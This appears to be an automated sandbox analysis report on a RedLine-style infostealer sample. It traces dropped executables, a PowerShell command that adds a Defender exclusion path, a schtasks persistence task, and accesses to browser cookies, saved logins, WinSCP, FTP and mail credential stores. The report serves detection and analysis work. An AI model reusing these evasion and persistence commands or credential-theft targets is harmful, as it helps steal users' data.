                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe | Code function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_004375B0
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe | Code function: 0_2_00436431 __wcsicoll,mouse_event,__wcsicoll,mouse_event, 0_2_00436431
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\AENiBH7X1q.exe"
                        Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Users\user\AppData\Local\Temp\microsofts.exe "C:\Users\user\AppData\Local\Temp\microsofts.exe"
                        Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe "C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe"
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe | Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe | Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:07 /du 23:59 /sc daily /ri 1 /f
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpEAAD.tmp.cmd""
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe | Code function: 0_2_00445DD3 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_00445DD3
                        Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_04DF8550 GetVolumeInformationW,wsprintfW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW, 2_2_04DF8550
                        Source: AENiBH7X1q.exe | Binary or memory string: Shell_TrayWnd
                        Source: AENiBH7X1q.exe, 00000000.00000000.2068986653.0000000000482000.00000002.00000001.01000000.00000003.sdmp, AENiBH7X1q.exe, 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe | Code function: 0_2_00410D10 cpuid 0_2_00410D10
                        Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Queries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe VolumeInformation
                        Source: C:\Windows\System32\alg.exe | Queries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\build.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\build.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\build.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\build.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\build.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\build.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\build.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\build.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\build.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\build.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\AppVClient.exe | Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Windows\System32\FXSSVC.exe | Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\FXSSVC.exe | Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TSTEF8F.tmp VolumeInformation
                        Source: C:\Windows\System32\FXSSVC.exe | Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TSTEF90.tmp VolumeInformation
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Queries volume information: C:\ VolumeInformation
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\msdtc.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\Locator.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\SensorDataService.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Windows\System32\snmptrap.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\Spectrum.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\OpenSSH\ssh-agent.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\TieringEngineService.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\AgentService.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\vds.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\wbengine.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\TieringEngineService.exeKey value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_004223BC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_004223BC
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_004711D2 GetUserNameW,0_2_004711D2
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0040E470
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

Source: Yara match; File source: 3.3.microsofts.exe.5a0000.916.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5b0000.935.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5a0000.915.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5a0000.1054.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5e0000.1088.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.0.Native_Redline_BTC.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5b0000.1083.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5c0000.1089.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.svchost.exe.6200000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5e0000.1085.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5b0000.936.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5f0000.976.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5c0000.1090.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5a0000.1053.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5a0000.1107.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5e0000.1087.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.svchost.exe.6200000.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5f0000.975.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5d0000.1151.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5f0000.1055.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5e0000.1084.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5b0000.1127.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5b0000.1128.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5a0000.1108.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5a0000.1152.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5c0000.1109.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5e0000.1086.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.600000.1082.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5d0000.1150.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000003.00000003.2390841675.0000000007550000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000000.2105969324.0000000000AB2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000003.2396891377.0000000007550000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.2121412758.0000000006200000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000003.2107829851.00000000006B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe, type: DROPPED
Source: Yara match; File source: 4.2.Native_Redline_BTC.exe.12ec4d08.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.Native_Redline_BTC.exe.12ec4d08.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.Native_Redline_BTC.exe.12f0ff50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.Native_Redline_BTC.exe.12f0ff50.5.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.0.build.exe.de0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.Native_Redline_BTC.exe.12f5b188.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.Native_Redline_BTC.exe.12f5b188.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000004.00000002.2126254452.0000000012F52000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.2126254452.0000000012E79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000000.2122053176.0000000000DE2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.2126254452.0000000012F07000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: Native_Redline_BTC.exe PID: 1900, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: build.exe PID: 1412, type: MEMORYSTR
Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe; File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe; File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe; File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe; File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
